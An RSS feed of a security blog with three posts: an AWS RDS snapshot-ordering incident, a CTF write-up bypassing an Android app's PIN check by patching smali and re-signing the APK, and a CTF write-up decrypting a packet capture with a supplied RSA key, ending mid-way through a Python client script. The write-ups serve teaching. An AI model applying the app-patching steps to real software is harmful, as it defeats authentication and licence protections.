<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Chris's Security and Tech Blog</title>
    <description>Information security and technology tales</description>
    <link>/</link>
    <atom:link href="/feed.xml" rel="self" type="application/rss+xml"/>
    <pubDate>Mon, 27 Mar 2023 20:52:27 +0000</pubDate>
    <lastBuildDate>Mon, 27 Mar 2023 20:52:27 +0000</lastBuildDate>
    <generator>Jekyll v3.9.0</generator>
    
      <item>
        <title>Ordering matters - the case of the slow RDS snapshots</title>
        <description>&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;At Gearset, we have a modest fleet of PostgreSQL (“Postgres”) database instances running in Amazon Web Services’s (AWS’s) Relational Database Service (RDS) offering. These database instances hold data for the variety of services that comprise our product and internal systems and they run across several geographic regions, in our production, staging, and other environments.&lt;/p&gt;

&lt;p&gt;We run all of our databases in a configuration known as multi-AZ, where AZ stands for “Availability Zone”. Essentially, a multi-AZ database instance is two instances behind the scenes, with replication between them, which lets us fail over from one to the other, manually or automatically, to maintain availability through upgrades, hardware failures, and so on.&lt;/p&gt;

&lt;p&gt;We regularly have to perform maintenance on these database instances to install operating system updates, upgrade the database engine, or change certain aspects of their configuration which cannot be done without a reboot.&lt;/p&gt;

&lt;p&gt;Some parts of Gearset can have their databases upgraded during working hours, either because they back internal-facing systems (where downtime is less of a concern), or because they back services which, despite being customer-facing, are resilient to storage-layer outages.&lt;/p&gt;

&lt;p&gt;Naturally, we began this maintenance cycle by upgrading databases backing the less finicky parts of Gearset.&lt;/p&gt;

&lt;p&gt;It’s a good job we did, because it has turned up an interesting problem in our approach to maintenance this time around, which, now understood, should save us a great deal of time when we move on to the more critical components - the ones where we have to do it out of hours in order to reduce the impact on our customers.&lt;/p&gt;

&lt;p&gt;This isn’t the first time we’ve performed maintenance on our RDS Postgres instances where it required downtime. We’ve been through several minor and major upgrade cycles, we’ve installed OS patches, we’ve seen it all before - or so we thought. Outside of those maintenance windows, due to the less resilient parts of the platform, we opt out of anything that could trigger otherwise-avoidable reboots or failovers of some of our database instances.&lt;/p&gt;

&lt;p&gt;This maintenance window, we’re doing something we’ve never done before: we’re both installing OS patches &lt;em&gt;and&lt;/em&gt; doing a minor engine upgrade.&lt;/p&gt;

&lt;h2 id=&quot;the-plan&quot;&gt;The plan&lt;/h2&gt;
&lt;p&gt;The plan that we’ve been following this time around was as follows:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;take a manual snapshot of the target instance (with the understanding that this would expedite the automatic snapshot(s) that we knew would later occur as part of the upgrade process, since RDS snapshots are essentially incremental)&lt;/li&gt;
  &lt;li&gt;kick off the OS patching process and wait until that was done&lt;/li&gt;
  &lt;li&gt;kick off the minor version upgrade from one version of Postgres to another&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If at this point you’re screaming at this blog post about what’s going to go wrong, &lt;a href=&quot;https://gearset.com/careers&quot;&gt;we’re hiring&lt;/a&gt;.&lt;/p&gt;

&lt;h2 id=&quot;the-outcome&quot;&gt;The outcome&lt;/h2&gt;
&lt;p&gt;For one of our medium-sized instances, with only a few terabytes of allocated storage, the initial manual snapshot took 15 minutes. This was a little longer than we expected - the automated snapshot for that instance had only taken a couple of minutes earlier that morning, and it had received far less traffic than usual in the meantime - but we didn’t think this was a problem, because we didn’t yet have to take the internal applications that relied on this database instance offline.&lt;/p&gt;

&lt;p&gt;Once the manual snapshot was finished, we took the dependent applications offline and applied the OS patches. This only took a few minutes.&lt;/p&gt;

&lt;p&gt;So far, so good.&lt;/p&gt;

&lt;p&gt;Then we requested the minor database engine version upgrade.&lt;/p&gt;

&lt;p&gt;A minor version upgrade involves automatic snapshots before and after the actual engine upgrade. We knew this; it was the reason we’d taken manual snapshots earlier, so that those automatic snapshots would be quick.&lt;/p&gt;

&lt;p&gt;The pre-upgrade snapshot took 4 hours.&lt;/p&gt;

&lt;p&gt;Whilst this was an internal-facing application, its availability was still fairly important to our sales team. The “one hour” of expected downtime that we had promised them stretched into nearly five hours of unexpected downtime, and impacted their ability to do their job.&lt;/p&gt;

&lt;p&gt;Oops.&lt;/p&gt;

&lt;h2 id=&quot;lets-do-it-again&quot;&gt;Let’s do it again&lt;/h2&gt;
&lt;p&gt;We chalked this up to an idiosyncrasy of RDS - it’s a managed service, and you don’t know what quotas or burst balances might have impacted you. We promised that we wouldn’t take down that application for that long again in the future, and moved on after a fruitless discussion about what might have gone wrong.&lt;/p&gt;

&lt;p&gt;Then another team in Gearset followed the same process for a &lt;em&gt;much&lt;/em&gt; larger database instance, backing a customer-facing service. Same approach, worse consequences. The upgrade took nearly 12 hours, most of which was once again spent taking that automatic pre-upgrade snapshot.&lt;/p&gt;

&lt;h2 id=&quot;whats-going-on&quot;&gt;What’s going on?&lt;/h2&gt;
&lt;p&gt;We are a few days away from having to take Gearset offline in order to upgrade the databases which are on the critical path. Early start on a Saturday morning, usually takes a few hours under the best of circumstances, and we’ve got the snapshot demon taunting us. At this point, it feels like we’ve accepted that we may never know the cause of The Snapshots From Hell.&lt;/p&gt;

&lt;p&gt;I’m on a call with my teammate today, Barry Leonard. We’re chatting off-hand about the incidents behind us, the risk ahead of us, and what options we have at our disposal on the day if it doesn’t go our way.&lt;/p&gt;

&lt;p&gt;And a very fortuitous conversation it was.&lt;/p&gt;

&lt;p&gt;AZ this, snapshot that, instance here, replication there…&lt;/p&gt;

&lt;p&gt;And then epiphany struck, from a set of facts:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;multi-AZ databases run in two AZs in a given region: a primary and a secondary, which get failed over between (the primary becomes the secondary, and vice versa, after a failover)&lt;/li&gt;
  &lt;li&gt;we don’t do multi-AZ failovers very often, if we can avoid it&lt;/li&gt;
  &lt;li&gt;snapshots, both manual and automatic, are taken against the secondary&lt;/li&gt;
  &lt;li&gt;snapshots live in a single AZ: the “speed” advantage of having a previous snapshot to derive from is reliant on topology&lt;/li&gt;
  &lt;li&gt;OS patches cause a failover from the primary to the secondary, but not back again afterwards&lt;/li&gt;
  &lt;li&gt;minor version upgrades take a snapshot of the secondary, upgrade both the primary and the secondary, then take another snapshot of the secondary, with no failover in between&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;What had been happening was this: a given multi-AZ instance had had its primary running in a certain AZ for a long time; we kicked off a manual snapshot for that instance, which was taken in the AZ of the secondary instance (let’s say AZ1); we kicked off OS patching, which caused a failover, so the instance in AZ2 became the secondary; then, when we kicked off the minor version upgrade, it triggered a snapshot of the instance in AZ2, which had no recent snapshots to be “quickly incremental” against.&lt;/p&gt;

&lt;p&gt;What makes this even more confusing is that AWS’s documentation says that the snapshots happen against the secondary instance (and their support confirmed this to us whilst we were trying to understand what had happened with our first two upgrades), but the AWS Console shows the AZ for the primary and the AZ of the snapshots as being all in the primary region - I’m not sure if this is a case of poor documentation or a case of the Console trying to show a “less confusing” view.&lt;/p&gt;

&lt;h2 id=&quot;the-solution&quot;&gt;The solution&lt;/h2&gt;
&lt;p&gt;So what are we going to do on Saturday?&lt;/p&gt;

&lt;p&gt;Well, now that we know that ordering matters, for each of the database instances we are performing maintenance on, after the OS patch we’re going to trigger a reboot with failover before applying the minor database upgrade. This should ensure the automated snapshots happen in an AZ where they have a recent snapshot to derive from, which should hopefully result in a much quicker process and less downtime for our customers. Wish us luck! (I will update this post if it all goes terribly wrong…)&lt;/p&gt;

&lt;h2 id=&quot;update-2023-03-27&quot;&gt;Update (2023-03-27)&lt;/h2&gt;
&lt;p&gt;We intentionally performed a failover between the OS patches and the minor version upgrades on the big day - it went exactly as we’d hoped! Very little time spent on the automated snapshots, and they were taken in the same region that the previous several automated snapshots had happened in. This saved us a great deal of time and meant that our customers could get back to doing their critical Salesforce deployments over the weekend as they had originally planned.&lt;/p&gt;
</description>
        <pubDate>Thu, 16 Mar 2023 00:00:00 +0000</pubDate>
        <link>/post/ordering-matters-the-case-of-the-slow-rds-snapshots/</link>
        <guid isPermaLink="true">/post/ordering-matters-the-case-of-the-slow-rds-snapshots/</guid>
        
        
      </item>
    
      <item>
        <title>CyberThreat18 CTF challenge write-up - &quot;Binary A&quot;</title>
        <description>&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;I recently attended a new cyber security conference in London called &lt;a href=&quot;https://www.cyberthreat2018.com/&quot;&gt;CyberThreat18&lt;/a&gt; hosted by the National Cyber Security Centre and SANS Institute.&lt;/p&gt;

&lt;p&gt;Over the two-day period, the event included a Capture The Flag (CTF) competition, broken into four sessions, in which teams and individuals raced to crack the challenges and collect the most points.&lt;/p&gt;

&lt;p&gt;This is a write-up of one of the challenges called “Binary challenge A”, and the methods used here were taken from &lt;a href=&quot;https://pen-testing.sans.org/blog/2015/06/30/modifying-android-apps-a-sec575-hands-on-exercise-part-1&quot;&gt;an excellent two-part blog post&lt;/a&gt; series by &lt;a href=&quot;https://twitter.com/edskoudis&quot;&gt;@edskoudis&lt;/a&gt; on the SANS Penetration Testing blog.&lt;/p&gt;

&lt;h2 id=&quot;challenge-description&quot;&gt;Challenge description&lt;/h2&gt;
&lt;p&gt;We’re given a link to download a zip file which contains the challenge assets; a single Android application package file (APK) named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ncscpin.apk&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Installing the application into a &lt;a href=&quot;https://www.genymotion.com/&quot;&gt;Genymotion&lt;/a&gt; virtual Android device (helpfully, Genymotion starts an instance of ADB server with the virtual device available, so we can just do &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;adb install ncscpin.apk&lt;/code&gt; and we’re good to go) we end up with an app called NCSCPin. Firing it up, we are presented with a five-digit PIN entry dialogue. Entering a random guess such as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;12345&lt;/code&gt; gives us a toast notification informing us that the PIN was incorrect. Moreover, it doesn’t seem like you can attempt to enter the PIN twice without closing the application and killing it from its suspended state.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/ct18-ctf-ba-1.png&quot; alt=&quot;NCSCPin app with invalid PIN entered&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Clearly brute-forcing it is out of the question, so it’s time to get creative.&lt;/p&gt;

&lt;h2 id=&quot;pulling-apart-the-apk&quot;&gt;Pulling apart the APK&lt;/h2&gt;
&lt;p&gt;Using the excellent &lt;a href=&quot;https://ibotpeaches.github.io/Apktool/&quot;&gt;Apktool&lt;/a&gt; we can pull apart the APK and have the application’s dex bytecode decompiled into smali files.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ apktool d -r ncscpin.apk
I: Using Apktool 2.3.1 on ncscpin.apk
I: Copying raw resources...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
$ tree -L 1 ncscpin
ncscpin
├── AndroidManifest.xml
├── apktool.yml
├── lib
├── original
├── res
├── resources.arsc
└── smali

4 directories, 3 files
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Note the use of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-r&lt;/code&gt; flag to avoid decoding the package’s resources - we don’t need to modify these, and you can sometimes hit issues trying to rebuild the APK if the resources have been decoded. By not decoding them, they will simply be copied in their original form when rebuilding the package.&lt;/p&gt;

&lt;p&gt;Apktool has created a few directories for us here, and the one we’re interested in is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;smali&lt;/code&gt;, which is where it has placed the decompiled application code.&lt;/p&gt;

&lt;h2 id=&quot;patching-the-app&quot;&gt;Patching the app&lt;/h2&gt;

&lt;p&gt;Of interest to us in particular are the two &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;MainActivity&lt;/code&gt; files in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;smali/com/example/mainuser/ncscpin&lt;/code&gt; - these are essentially the equivalent of an entrypoint for an Android application.&lt;/p&gt;

&lt;p&gt;In &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;MainActivity.smali&lt;/code&gt; we can see a method declared as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;native&lt;/code&gt; (so its body lives in native code rather than in the dex bytecode) called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;isPinCorrect&lt;/code&gt; - sounds interesting!&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;.method public native isPinCorrect(Ljava/lang/String;)Z
.end method
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;In &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;MainActivity$1.smali&lt;/code&gt; we can see where this function is called from and a conditional jump on the value it returns:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;invoke-virtual {v0, v1}, Lcom/example/mainuser/ncscpin/MainActivity;-&amp;gt;isPinCorrect(Ljava/lang/String;)Z

move-result v0

if-eqz v0, :cond_0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;By changing the conditional jump instruction from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;if-eqz&lt;/code&gt; to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;if-nez&lt;/code&gt; we can essentially reverse the PIN validation so that entering anything &lt;em&gt;other&lt;/em&gt; than the “correct” PIN (which we don’t know) will be treated as a &lt;em&gt;correct&lt;/em&gt; attempt.&lt;/p&gt;

&lt;h2 id=&quot;rebuilding-signing-installing&quot;&gt;Rebuilding, signing, installing&lt;/h2&gt;

&lt;p&gt;Now that we’ve made our desired change, we can rebuild the package, again using Apktool, which places the rebuilt package in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dist&lt;/code&gt; folder under our top-level extraction directory.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ apktool b ncscpin
I: Using Apktool 2.3.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
$ tree ncscpin/dist/
ncscpin/dist/
└── ncscpin.apk

0 directories, 1 file
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Unfortunately, we can’t just deploy this new APK file as it currently stands - attempting to do so gives us the following error:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ adb install ncscpin/dist/ncscpin.apk
adb: failed to install ncscpin/dist/ncscpin.apk: Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES: Failed to collect certificates from /data/app/vmdl1069109607.tmp/base.apk: Attempt to get length of null array]
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We need to sign our APK file, and in order to do that we need to generate a key and certificate for ourselves. We’ll do the key and certificate generation and signing using the Java &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;keytool&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jarsigner&lt;/code&gt; tools respectively.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ keytool -v -genkey -keystore ncscpin.keystore \
&amp;gt;            -alias NCSCPin \
&amp;gt;            -keyalg RSA \
&amp;gt;            -keysize 1024 \
&amp;gt;            -sigalg SHA1withRSA \
&amp;gt;            -validity 356
Enter keystore password:  
Re-enter new password:
What is your first and last name?
  [Unknown]:  Chris Moore
What is the name of your organizational unit?
  [Unknown]:  
What is the name of your organization?
  [Unknown]:  
What is the name of your City or Locality?
  [Unknown]:  
What is the name of your State or Province?
  [Unknown]:  
What is the two-letter country code for this unit?
  [Unknown]:  
Is CN=Chris Moore, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown correct?
  [no]:  yes

Generating 1,024 bit RSA key pair and self-signed certificate (SHA1withRSA) with a validity of 356 days
        for: CN=Chris Moore, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
[Storing ncscpin.keystore]
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now we can use this keystore to sign our APK file:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ jarsigner -keystore ncscpin.keystore \
&amp;gt;           -sigalg SHA1withRSA \
&amp;gt;           -digestalg SHA1 NCSCPin \
&amp;gt;           ncscpin/dist/ncscpin.apk
Enter Passphrase for keystore:
jar signed.

Warning:
The signer's certificate is self-signed.
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2019-02-21).
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now that we’ve signed our APK file, we can install it into our virtual Android device. Note that we have to uninstall the existing application first, as we haven’t gone to the effort of giving the application a valid update path.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ adb uninstall com.example.mainuser.ncscpin
Success
$ adb install ncscpin/dist/ncscpin.apk
Success
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Finally, we can fire up our modified version of the application inside the virtual Android device, enter our dummy PIN of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;12345&lt;/code&gt; and we get a toast notification containing the flag of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HooksArentJustForPirates&lt;/code&gt;!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/ct18-ctf-ba-2.png&quot; alt=&quot;Modified version of the application revealing the flag&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;closing-remarks&quot;&gt;Closing remarks&lt;/h2&gt;
&lt;p&gt;A massive thank you goes to the team at &lt;a href=&quot;https://twitter.com/HelicalLevity&quot;&gt;Helical Levity&lt;/a&gt; for putting together the pre-conference challenges and this CTF, as well as to &lt;a href=&quot;https://twitter.com/jameslyne&quot;&gt;James Lyne&lt;/a&gt; and the folks at &lt;a href=&quot;https://twitter.com/SANSEMEA&quot;&gt;SANS EMEA&lt;/a&gt; and the &lt;a href=&quot;https://twitter.com/ncsc&quot;&gt;National Cyber Security Centre&lt;/a&gt; for making this awesome conference happen.&lt;/p&gt;
</description>
        <pubDate>Fri, 02 Mar 2018 00:00:00 +0000</pubDate>
        <link>/post/cyberthreat18-ctf-ba/</link>
        <guid isPermaLink="true">/post/cyberthreat18-ctf-ba/</guid>
        
        
      </item>
    
      <item>
        <title>CyberThreat18 CTF challenge write-up - &quot;Network A&quot;</title>
        <description>&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;I recently attended a new cyber security conference in London called &lt;a href=&quot;https://www.cyberthreat2018.com/&quot;&gt;CyberThreat18&lt;/a&gt; hosted by the National Cyber Security Centre and SANS Institute.&lt;/p&gt;

&lt;p&gt;Over the two-day period, the event included a Capture The Flag (CTF) competition, broken into four sessions, in which teams and individuals raced to crack the challenges and collect the most points.&lt;/p&gt;

&lt;p&gt;This is a write-up of one of the challenges called “Network challenge A”.&lt;/p&gt;

&lt;h2 id=&quot;challenge-description&quot;&gt;Challenge description&lt;/h2&gt;
&lt;p&gt;We’re given a link to download a zip file which contains the challenge assets; a packet capture file (PCAP) named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;somepcap.pcapng&lt;/code&gt; and an RSA private key file in PEM format named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;somepem.pem&lt;/code&gt;. We’re also instructed that the flag we require needs to be acquired from “the service” running on &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ctf-ch7.cyberthreat2018.com&lt;/code&gt;. Time to crack open the PCAP!&lt;/p&gt;

&lt;h2 id=&quot;pcap-analysis&quot;&gt;PCAP analysis&lt;/h2&gt;
&lt;p&gt;Opening the PCAP, we see a single TCP conversation between two hosts; a client and what we can safely assume to be “the service” alluded to in the challenge description, which in the PCAP appears to be running on port &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;31337&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Following the TCP conversation in Wireshark, we see the following:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/ct18-ctf-na-2.png&quot; alt=&quot;TCP conversation between a client and the service of interest&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Coloured blue is the data sent by the service to the client, and coloured red is the data sent by the client to the service.&lt;/p&gt;

&lt;p&gt;At the beginning of the conversation, we see the service send the client an RSA public key, followed by the client sending the service an RSA public key in turn. What follows that is… gibberish, to the best of our current estimations. Showing the data as a hexdump instead, however, reveals a bit more structure to us…&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/ct18-ctf-na-3.png&quot; alt=&quot;TCP conversation shown as a hex dump&quot; /&gt;&lt;/p&gt;

&lt;p&gt;In particular, we see that the messages exchanged between the client and the service (after the exchanging of public keys) are always of a fixed size - 256 bytes (or 2048 bits).&lt;/p&gt;

&lt;p&gt;This is noteworthy, because the public keys that were exchanged were 2048-bit keys, and a property of RSA is that a single encryption operation cannot take a message larger than the key (modulus) size. Another property is that the ciphertext it produces is always exactly the key size, however small the message was.&lt;/p&gt;

&lt;p&gt;At this point, we might theorize that the messages exchanged are encrypted asymmetrically using RSA, with a high likelihood that the plaintext is padded out to 2048 bits in length prior to encryption. Specifically, when the client wishes to send a message to the service, it pads it and RSA-encrypts it using the public key which was sent to it by the service at the start of the conversation, and vice versa for service-to-client communications.&lt;/p&gt;

&lt;h2 id=&quot;taking-a-peek-at-the-data&quot;&gt;Taking a peek at the data&lt;/h2&gt;
&lt;p&gt;Recall that, as well as the PCAP file, we were also provided with an RSA private key file, called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;somepem.pem&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;From this private key file, we can calculate the corresponding public key using the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;openssl&lt;/code&gt; tool.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ openssl rsa -in somepem.pem -pubout
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAjIlaZyLpXHCodCbhSREA
mpRP9vjBqELq5AodBu7zXCjZspyb/jTNGzEek4QWvqIosoZ5MDgAK1TRUG8R4Hqh
qaz19cuD1quOovKRqqJEgaRsbRx8uW5vjsG6ge6kBJk9EOlkJe3COqXzsJWTIKc0
GeHfnp88v4C1Qge3BX3bQ7K4prcAWyxGEsh14bQ/oFY4MIq0aAr4+dzYP/hWxCqt
Jz8m3R5bOW/k2J7O8a9c8A7DVM6/HGIaKyLrLNuAqwhLFJM32jSLiGOxfDHDE1Aq
/QGjEPUImUXVRok7nHjbNIDJNNCbCLzr/rWGEYVWUTia/wPcUpYVv9S5/BdiTA5s
PQIDAQAB
-----END PUBLIC KEY-----
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;A-ha, this is the same as the public key which was sent from the client to the service in our packet capture, which means that we should be able to decrypt the messages in one of the directions in the TCP conversation - those from the service to the client.&lt;/p&gt;

&lt;p&gt;Let’s attempt to decrypt the first encrypted message from the service to the client. By switching to the YAML view in Wireshark we can grab the first message in Base64-encoded form, and experiment with openssl’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rsautl&lt;/code&gt; mode to try to decrypt it.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ echo ZLgeZ+9IuHmxqfdMfOb/CdaWo/xK6hzHz0HDAXBSST2PfwqPGJ0Ly+P8q/ZwfGoD7n9LxL8p+m+f \
       k1K41QYpKphoAp+zioORUU9qDlq64ht+IWn30FKnmVaJokwUpMLnY10gPYD1MEQQFWhbIlXYSpCZ \
       X/xVvOr/emXn+xkg1KAY8q4vG5n02vmF1Rmp5ltBpqm2PqCBXDHDRO6g2259RF4NAkhF3+y+DrCK \
       /8NTVFhDVRFm5QZ0BLCWUfFJwLLFpzbIv/Q/FlnZuA87d/lgpGYZ3ajHCGHbcOdcjoanYdzGY2v3 \
       Zh5iPm6L5AviusEii2VVcT3aQkMvLybPEHyjpw== | \
&amp;gt;   openssl base64 -d | \
&amp;gt;   openssl rsautl -inkey somepem.pem -oaep -decrypt
Commands:

quit
authenticate
adduser
help
getflag
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Bingo! The padding employed is PKCS#1 OAEP. We repeat this on the other messages sent from the service to the client to get the rest of this side of the conversation. I’ve used the convention of writing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;gt; ???&lt;/code&gt; to indicate the unknown client message, with the server response immediately below.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&amp;gt; ???
Commands:

quit
authenticate
adduser
help
getflag
&amp;gt; ???
Insufficient permissions! Please authenticate and try again.
&amp;gt; ???
Authentication successful.
&amp;gt; ???
User successfully added!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;getting-interactive&quot;&gt;Getting interactive&lt;/h2&gt;

&lt;p&gt;At this point, we can throw together a small (terribly written!!) Python script to interact with the service directly, which according to the challenge description is running on &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ctf-ch7.cyberthreat2018.com&lt;/code&gt;, most likely on port &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;31337&lt;/code&gt; according to the PCAP.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-python&quot; data-lang=&quot;python&quot;&gt;&lt;span class=&quot;kn&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;Crypto.Cipher&lt;/span&gt; &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;PKCS1_OAEP&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cip&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;Crypto.PublicKey&lt;/span&gt; &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;RSA&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;socket&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;base64&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;AF_INET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;SOCK_STREAM&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;connect&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;ctf-ch7.cyberthreat2018.com&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;31337&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;

